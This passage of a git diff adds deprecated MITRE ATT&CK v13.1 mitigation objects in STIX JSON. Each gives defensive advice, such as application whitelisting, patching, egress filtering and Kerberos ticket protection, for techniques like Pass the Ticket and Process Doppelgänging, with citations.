Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:21.495Z", + "name": "Runtime Data Manipulation Mitigation", + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31.json new file mode 100644 index 0000000000000000000000000000000000000000..b72df83dc8c6e704b8400aa63912e01deeac4193 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5f16d660-0cd7-4f8c-973b-6d88b6c4eeb1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1186", + "external_id": "T1186" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + } + ], + "modified": "2021-08-23T20:25:19.742Z", + "name": "Process Doppelg\u00e4nging Mitigation", + "description": "This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.\n\nAlthough Process Doppelg\u00e4nging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d.json new file mode 100644 index 0000000000000000000000000000000000000000..676105be14614caa4f710622720203c3f3a88ba6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--92cdfb6d-83a2-4c17-9093-3103442618ab", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1107", + "url": "https://attack.mitre.org/mitigations/T1107", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.685Z", + "name": "File Deletion Mitigation", + "description": "Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725.json new file mode 100644 index 0000000000000000000000000000000000000000..17db0ab856a1b903b40fe55cf9bb5d729fd7cd89 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--5f619408-f03b-42c1-9a8f-2b4cd4d7fcfa", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1211", + "external_id": "T1211" + }, + { + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "source_name": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "source_name": "TechNet Moving Beyond EMET" + }, + { + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "source_name": "Wikipedia Control Flow Integrity" + } + ], + "modified": "2019-07-24T19:25:39.532Z", + "name": "Exploitation for Defense Evasion Mitigation", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. 
Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7.json new file mode 100644 index 0000000000000000000000000000000000000000..122d5e4bc88a2a2ed4966e2f8da71b30b6048cf7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--67db26ba-1dab-4bfd-bf65-17edc827d769", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1114", + "url": "https://attack.mitre.org/mitigations/T1114", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:19.380Z", + "name": "Email Collection Mitigation", + "description": "Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.\n\nUse of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.\n\nIdentify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8.json new file mode 100644 index 0000000000000000000000000000000000000000..37c3ac435251a623d984dac4a291d12b6f50036b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--dbca7ee8-f8e8-4ad4-953b-46d3b68dfc42", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--388606d3-f38f-45bf-885d-a9dc9df3c8a8", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1089", + "external_id": "T1089" + } + ], + "modified": "2019-07-24T19:10:48.260Z", + "name": "Disabling Security Tools Mitigation", + "description": "Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--39706d54-0d06-4a25-816a-78cc43455100.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--39706d54-0d06-4a25-816a-78cc43455100.json new file mode 100644 index 0000000000000000000000000000000000000000..bc50e36467b2a19cb722ef9eaf39a8d1696bbe62 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--39706d54-0d06-4a25-816a-78cc43455100.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5b2e722b-9a99-40ef-bc6d-c24a1042ffc4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--39706d54-0d06-4a25-816a-78cc43455100", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1025", + "url": "https://attack.mitre.org/mitigations/T1025", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.688Z", + "name": "Data from Removable Media Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to collect data from removable media, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--399d9038-b100-43ef-b28d-a5065106b935.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--399d9038-b100-43ef-b28d-a5065106b935.json new file mode 100644 index 0000000000000000000000000000000000000000..0d27306e74693af1a51c3ac23142a5e348b1fe6d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--399d9038-b100-43ef-b28d-a5065106b935.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--880b373d-bf44-4b6b-be91-62897282def5", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--399d9038-b100-43ef-b28d-a5065106b935", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1095", + "external_id": "T1095" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T12:01:33.997Z", + "name": "Standard Non-Application Layer Protocol Mitigation", + "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.\n\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. 
(Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef.json new file mode 100644 index 0000000000000000000000000000000000000000..bf7f58f0081f4bbc362d07f70f1f768b2b408fa9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef.json 
@@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--b014ce1a-f43c-4f86-9fc0-9d0591657136", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3a41b366-cfd6-4af2-a6e7-3c6e3c4ebcef", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1196", + "url": "https://attack.mitre.org/mitigations/T1196", + "source_name": "mitre-attack" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Microsoft UAC", + "description": "Microsoft. (n.d.). User Account Control. Retrieved January 18, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx" + } + ], + "modified": "2020-01-17T16:45:23.678Z", + "name": "Control Panel Items Mitigation", + "description": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. 
For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.\n\nRestrict storage and execution of Control Panel items to protected directories, such as C:\\Windows, rather than user directories.\n\nIndex known safe Control Panel items and block potentially malicious software using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown executable files.\n\nConsider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators. (Citation: Microsoft UAC)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d.json new file mode 100644 index 0000000000000000000000000000000000000000..8ae8e086356044824390f94e8cd159f975ddd173 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--fcd76a72-d952-4642-ab48-f4c080d6e0b8", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3a476d83-43eb-4fad-9b75-b1febd834e3d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1097", + "url": "https://attack.mitre.org/mitigations/T1097", + "source_name": "mitre-attack" + }, + { + "url": "https://adsecurity.org/?p=556", + "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", + "source_name": "ADSecurity AD Kerberos Attacks" + }, + { + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "source_name": "CERT-EU Golden Ticket Protection" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). 
Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:21.478Z", + "name": "Pass the Ticket Mitigation", + "description": "Monitor domains for unusual credential logons. Limit credential overlap across systems to prevent the damage of credential compromise. Ensure that local administrator accounts have complex, unique passwords. Do not allow a user to be a local administrator for multiple systems. Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts. (Citation: ADSecurity AD Kerberos Attacks)\n\nFor containing the impact of a previously generated golden ticket, reset the built-in KRBTGT account password twice, which will invalidate any existing golden tickets that have been created with the KRBTGT hash and other Kerberos tickets derived from it. (Citation: CERT-EU Golden Ticket Protection)\n\nAttempt to identify and block unknown or malicious software that could be used to obtain Kerberos tickets and use them to authenticate by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. 
(Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483.json new file mode 100644 index 0000000000000000000000000000000000000000..9dbea764f75cdd3ddaf1ff3a5f7d1aad324cceb6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--729cbd12-1e2f-4e92-9c42-f8e48b6038b1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--3e7018e9-7389-48e7-9208-0bdbcbba9483", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1146", + "external_id": "T1146" + }, + { + "url": "http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory", + "description": "Mathew Branwell. (2012, March 21). Securing .bash_history file. Retrieved July 8, 2017.", + "source_name": "Securing bash history" + } + ], + "modified": "2019-07-24T18:05:00.492Z", + "name": "Clear Command History Mitigation", + "description": "Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their ~/.bash_history files. Additionally, making these environment variables readonly can make sure that the history is preserved (Citation: Securing bash history).", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--3e9f8875-d2f7-4380-a578-84393bd3b025.json new file mode 100644 index 